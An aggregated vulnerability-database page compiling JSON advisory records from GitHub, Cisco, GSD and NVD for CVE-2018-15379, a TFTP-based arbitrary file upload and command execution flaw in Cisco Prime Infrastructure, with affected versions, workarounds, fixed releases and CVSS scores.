        "db": "PACKETSTORM",
        "id": "149714"
      },
      {
        "db": "PACKETSTORM",
        "id": "149727"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Prime Infrastructure for  HTTP web Server permission vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ],
    "trust": 0.6
  }
}

ghsa-h92j-m24w-8xp7

Vulnerability from github

Published

2022-05-13 01:34

Modified

2022-05-13 01:34

Severity ?

9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-15379"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-05T14:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication.",
  "id": "GHSA-h92j-m24w-8xp7",
  "modified": "2022-05-13T01:34:22Z",
  "published": "2022-05-13T01:34:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15379"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45555"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105506"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1041816"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

cisco-sa-20181003-pi-tftp

Vulnerability from csaf_cisco

Published

2018-10-03 16:00

Modified

2018-10-03 16:00

Summary

Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability

Notes

Summary

A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp ["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"]

Vulnerable Products

Cisco PI Software Releases 3.2 through 3.4 prior to the first fixed release are vulnerable if the TFTP server is enabled, which is the default setting. The administrator can check the TFTP status by navigating in the web interface to Administration > Settings > System Settings > Server > TFTP. The PI Federal Information Processing Standards (FIPS) image has TFTP disabled by default. Determining the PI Software Release To determine the software release that is running on the appliance, administrators can use one of the following methods. The administrator can issue the show version command in the console CLI. The following output is from an affected application running PI Software Release 3.2.0 with PI Maintenance Release 3.2.2 installed: piconsole# show version Cisco Application Deployment Engine OS Release: 3.2 ADE-OS Build Version: 3.2.0.001 ADE-OS System Architecture: x86_64 Copyright (c) 2009-2016 by Cisco Systems, Inc. All rights reserved. Hostname: lmpy-spc-princess Version information of installed applications --------------------------------------------- Cisco Prime Infrastructure ******************************************************** Version : 3.2.0 Build : 3.2.0.0.132 Critical Fixes: PI 3.2.2 Maintenance Release ( 6.0.0 ) Device Support: Prime Infrastructure 3.2 Device Pack 11 ( 11.0 ) The administrator can also view the PI release and maintenance release updates by logging in to the web interface using the http(s)://<system-ip> access URL. The PI software release is displayed on the welcome screen and the administrator can click View Installed Update, which opens a pop-up window with a list of PI maintenance releases and patches. The following is an example of text that is displayed in the pop-up window for PI Software Release 3.2: Cisco Prime Infrastructure Version 3.2 View Installed Update The pop-up window will display the list of maintenance release updates in the following format: Update Name PI 3.2.2 Maintenance Release The administrator can also view the PI release and maintenance release updates by logging in to the web interface using the http(s)://<system-ip> access URL and navigating to the Gear > About Prime Infrastructure > View Installed Updates screen. The release information is displayed as follows: Installed Updates Critical Fixes Update Name Version PI 3.2.2 Maintenance Rel... 6.0.0 Device Support Update Name Prime Infrastructure 3.2

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products ["#vp"] section of this advisory are known to be affected by this vulnerability. Cisco has confirmed that Cisco Evolved Programmable Network Manager (EPNM) is not vulnerable.

Workarounds

The administrator can disable TFTP for Cisco PI by navigating in the web interface to Administration > Settings > System Settings > Server > TFTP. In Cisco PI, TFTP is used for internal operations such as image transfer, configuration, and archives. The administrator can instead use a secure protcotol such as Secure Copy Protocol (SCP) or SFTP for these functions.

Fixed Software

Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html ["https://www.cisco.com/c/en/us/products/end-user-license-agreement.html"] Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page ["https://www.cisco.com/go/psirt"], to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html ["https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html"] Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Customers should upgrade to an appropriate release as indicated in the following table: Cisco Prime Infrastructure Major Release First Fixed Release for This Vulnerability 3.2 3.3.1 Update 02 3.2 FIPS No fix available1 3.3 3.3.1 Update 02 3.4 3.4.1 1. TFTP is disabled by default in Cisco PI Release 3.2 FIPS. The administrator can also use the workaround that is provided in this advisory. Software Download Customers can download Cisco Prime Infrastructure Software from the Software Center ["https://software.cisco.com/download/home"] on Cisco.com by doing the following: Click Browse all. Navigate to Cloud and Systems Management > Routing and Switching Management > Network Management Solutions > Prime Infrastructure. Access Cisco PI releases by using the right pane of the software downloads navigation.

Vulnerability Policy

To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy ["https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.

Exploitation and Public Announcements

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

Source

Cisco would like to thank an independent security researcher, Pedro Ribeiro, who reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

Legal Disclaimer

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "summary": "Cisco would like to thank an independent security researcher, Pedro Ribeiro, who reported this vulnerability to Beyond Security\u0027s SecuriTeam Secure Disclosure program."
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "notes": [
      {
        "category": "summary",
        "text": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges.\r\n\r\nThe vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication.\r\n\r\nCisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.\r\n\r\nThis advisory is available at the following link:\r\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\"]",
        "title": "Summary"
      },
      {
        "category": "general",
        "text": "Cisco PI Software Releases 3.2 through 3.4 prior to the first fixed release are vulnerable if the TFTP server is enabled, which is the default setting. The administrator can check the TFTP status by navigating in the web interface to Administration \u003e Settings \u003e System Settings \u003e Server \u003e TFTP.\r\n\r\nThe PI Federal Information Processing Standards (FIPS) image has TFTP disabled by default.\r\n  Determining the PI Software Release\r\nTo determine the software release that is running on the appliance, administrators can use one of the following methods.\r\n\r\nThe administrator can issue the show version command in the console CLI. The following output is from an affected application running PI Software Release 3.2.0 with PI Maintenance Release 3.2.2 installed:\r\n\r\npiconsole# show version\r\nCisco Application Deployment Engine OS Release: 3.2\r\nADE-OS Build Version: 3.2.0.001\r\nADE-OS System Architecture: x86_64\r\n\r\nCopyright (c) 2009-2016 by Cisco Systems, Inc.\r\nAll rights reserved.\r\nHostname: lmpy-spc-princess\r\n\r\nVersion information of installed applications\r\n---------------------------------------------\r\n\r\nCisco Prime Infrastructure\r\n********************************************************\r\nVersion : 3.2.0\r\nBuild : 3.2.0.0.132\r\nCritical Fixes:\r\nPI 3.2.2 Maintenance Release ( 6.0.0 )\r\nDevice Support:\r\nPrime Infrastructure 3.2 Device Pack 11 ( 11.0 )\r\n\r\nThe administrator can also view the PI release and maintenance release updates by logging in to the web interface using the http(s)://\u003csystem-ip\u003e access URL. The PI software release is displayed on the welcome screen and the administrator can click View Installed Update, which opens a pop-up window with a list of PI maintenance releases and patches. The following is an example of text that is displayed in the pop-up window for PI Software Release 3.2:\r\n\r\nCisco Prime Infrastructure\r\nVersion 3.2\r\nView Installed Update\r\n    The pop-up window will display the list of maintenance release updates in the following format:\r\nUpdate Name\r\nPI 3.2.2 Maintenance Release\r\n\r\nThe administrator can also view the PI release and maintenance release updates by logging in to the web interface using the http(s)://\u003csystem-ip\u003e access URL and navigating to the Gear \u003e About Prime Infrastructure \u003e View Installed Updates screen. The release information is displayed as follows:\r\n\r\nInstalled Updates\r\n\r\nCritical Fixes\r\nUpdate Name            Version\r\nPI 3.2.2 Maintenance Rel...    6.0.0\r\n\r\nDevice Support\r\nUpdate Name\r\nPrime Infrastructure 3.2",
        "title": "Vulnerable Products"
      },
      {
        "category": "general",
        "text": "Only products listed in the Vulnerable Products [\"#vp\"] section of this advisory are known to be affected by this vulnerability.\r\n\r\nCisco has confirmed that Cisco Evolved Programmable Network Manager (EPNM) is not vulnerable.",
        "title": "Products Confirmed Not Vulnerable"
      },
      {
        "category": "general",
        "text": "The administrator can disable TFTP for Cisco PI by navigating in the web interface to Administration \u003e Settings \u003e System Settings \u003e Server \u003e TFTP. In Cisco PI, TFTP is used for internal operations such as image transfer, configuration, and archives. The administrator can instead use a secure protcotol such as Secure Copy Protocol (SCP) or SFTP for these functions.",
        "title": "Workarounds"
      },
      {
        "category": "general",
        "text": "Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:  https://www.cisco.com/c/en/us/products/end-user-license-agreement.html [\"https://www.cisco.com/c/en/us/products/end-user-license-agreement.html\"]\r\n\r\nAdditionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.\r\n\r\nWhen considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page [\"https://www.cisco.com/go/psirt\"], to determine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.\r\n  Customers Without Service Contracts\r\nCustomers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html [\"https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html\"]\r\n\r\nCustomers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.\r\n  Fixed Releases\r\nCustomers should upgrade to an appropriate release as indicated in the following table:\r\n                                Cisco Prime Infrastructure Major Release                            First Fixed Release for This Vulnerability                                                3.2\r\n              3.3.1 Update 02\r\n                                  3.2 FIPS              No fix available1                                  3.3              3.3.1 Update 02\r\n                                  3.4              3.4.1\r\n1. TFTP is disabled by default in Cisco PI Release 3.2 FIPS. The administrator can also use the workaround that is provided in this advisory.\r\n\r\n\r\n\r\nSoftware Download\r\n\r\nCustomers can download Cisco Prime Infrastructure Software from the Software Center [\"https://software.cisco.com/download/home\"] on Cisco.com by doing the following:\r\n\r\nClick Browse all.\r\nNavigate to Cloud and Systems Management \u003e Routing and Switching Management \u003e Network Management Solutions \u003e Prime Infrastructure.\r\nAccess Cisco PI releases by using the right pane of the software downloads navigation.",
        "title": "Fixed Software"
      },
      {
        "category": "general",
        "text": "To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html\"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.",
        "title": "Vulnerability Policy"
      },
      {
        "category": "general",
        "text": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.",
        "title": "Exploitation and Public Announcements"
      },
      {
        "category": "general",
        "text": "Cisco would like to thank an independent security researcher, Pedro Ribeiro, who reported this vulnerability to Beyond Security\u0027s SecuriTeam Secure Disclosure program.",
        "title": "Source"
      },
      {
        "category": "legal_disclaimer",
        "text": "THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.\r\n\r\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.",
        "title": "Legal Disclaimer"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "Emergency Support:\r\n+1 877 228 7302 (toll-free within North America)\r\n+1 408 525 6532 (International direct-dial)\r\nNon-emergency Support:\r\nEmail: psirt@cisco.com\r\nSupport requests that are received via e-mail are typically acknowledged within 48 hours.",
      "issuing_authority": "Cisco product security incident response is the responsibility of the Cisco Product Security Incident Response Team (PSIRT). The Cisco PSIRT is a dedicated, global team that manages the receipt, investigation, and public reporting of security vulnerability information that is related to Cisco products and networks. The on-call Cisco PSIRT works 24x7 with Cisco customers, independent security researchers, consultants, industry organizations, and other vendors to identify possible security issues with Cisco products and networks.\r\nMore information can be found in Cisco Security Vulnerability Policy available at https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html",
      "name": "Cisco",
      "namespace": "https://wwww.cisco.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
      },
      {
        "category": "external",
        "summary": "Cisco Security Vulnerability Policy",
        "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"
      },
      {
        "category": "external",
        "summary": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp",
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
      },
      {
        "category": "external",
        "summary": "https://www.cisco.com/c/en/us/products/end-user-license-agreement.html",
        "url": "https://www.cisco.com/c/en/us/products/end-user-license-agreement.html"
      },
      {
        "category": "external",
        "summary": "Cisco Security Advisories and Alerts page",
        "url": "https://www.cisco.com/go/psirt"
      },
      {
        "category": "external",
        "summary": "https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html",
        "url": "https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html"
      },
      {
        "category": "external",
        "summary": "Software Center",
        "url": "https://software.cisco.com/download/home"
      },
      {
        "category": "external",
        "summary": "Security Vulnerability Policy",
        "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"
      }
    ],
    "title": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
    "tracking": {
      "current_release_date": "2018-10-03T16:00:00+00:00",
      "generator": {
        "date": "2022-09-03T03:08:25+00:00",
        "engine": {
          "name": "TVCE"
        }
      },
      "id": "cisco-sa-20181003-pi-tftp",
      "initial_release_date": "2018-10-03T16:00:00+00:00",
      "revision_history": [
        {
          "date": "2018-10-03T15:50:51+00:00",
          "number": "1.0.0",
          "summary": "Initial public release."
        }
      ],
      "status": "final",
      "version": "1.0.0"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "category": "product_family",
            "name": "Cisco Prime Infrastructure",
            "product": {
              "name": "Cisco Prime Infrastructure ",
              "product_id": "CSAFPID-190324"
            }
          }
        ],
        "category": "vendor",
        "name": "Cisco"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2018-15379",
      "ids": [
        {
          "system_name": "Cisco Bug ID",
          "text": "CSCvk24890"
        }
      ],
      "notes": [
        {
          "category": "other",
          "text": "Complete.",
          "title": "Affected Product Comprehensiveness"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-190324"
        ]
      },
      "release_date": "2018-10-03T16:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "Cisco has released software updates that address this vulnerability.",
          "product_ids": [
            "CSAFPID-190324"
          ],
          "url": "https://software.cisco.com"
        },
        {
          "category": "workaround",
          "details": "The administrator can disable TFTP for Cisco PI by navigating in the web interface to Administration \u003e Settings \u003e System Settings \u003e Server \u003e TFTP. In Cisco PI, TFTP is used for internal operations such as image transfer, configuration, and archives. The administrator can instead use a secure protcotol such as Secure Copy Protocol (SCP) or SFTP for these functions.",
          "product_ids": [
            "CSAFPID-190324"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-190324"
          ]
        }
      ],
      "title": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability"
    }
  ]
}

gsd-2018-15379

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

Aliases

CVE-2018-15379

Aliases

CVE-2018-15379

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-15379",
    "description": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication.",
    "id": "GSD-2018-15379",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-15379"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-15379"
      ],
      "details": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication.",
      "id": "GSD-2018-15379",
      "modified": "2023-12-13T01:22:24.097228Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "DATE_PUBLIC": "2018-10-03T16:00:00-0500",
        "ID": "CVE-2018-15379",
        "STATE": "PUBLIC",
        "TITLE": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Cisco Prime Infrastructure ",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Cisco"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication."
          }
        ]
      },
      "impact": {
        "cvss": {
          "baseScore": "7.3",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-275"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "45555",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45555/"
          },
          {
            "name": "20181003 Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
            "refsource": "CISCO",
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
          },
          {
            "name": "105506",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/105506"
          },
          {
            "name": "1041816",
            "refsource": "SECTRACK",
            "url": "http://www.securitytracker.com/id/1041816"
          }
        ]
      },
      "source": {
        "advisory": "cisco-sa-20181003-pi-tftp",
        "defect": [
          [
            "CSCvk24890"
          ]
        ],
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.5\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(2.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:fips:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(1.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2018-15379"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-732"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20181003 Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
              "refsource": "CISCO",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
            },
            {
              "name": "105506",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/105506"
            },
            {
              "name": "45555",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/45555/"
            },
            {
              "name": "1041816",
              "refsource": "SECTRACK",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securitytracker.com/id/1041816"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-09T23:35Z",
      "publishedDate": "2018-10-05T14:29Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
